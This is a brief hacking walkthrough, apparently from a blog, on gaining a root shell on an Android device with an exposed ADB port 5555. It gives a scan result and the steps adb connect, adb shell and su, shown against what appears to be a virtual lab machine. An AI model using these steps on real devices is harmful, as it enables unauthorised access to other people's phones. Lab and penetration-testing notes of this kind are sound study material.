Hacking walkthrough: Hacking adb port (Android)
This only works if the the adb port is opened :
5555/tcp open adb Android Debug Bridge device (name: android_x86; model: VMware Virtual Platform; device: x86)
Sometimes Metasploit wont let you get a shell for an Android device. . There is a simpler way to do it:
- Install adb
- adb connect ip-address:port
- adb shell
- Type: su
- You are root now , congratulations
Comments
Post a Comment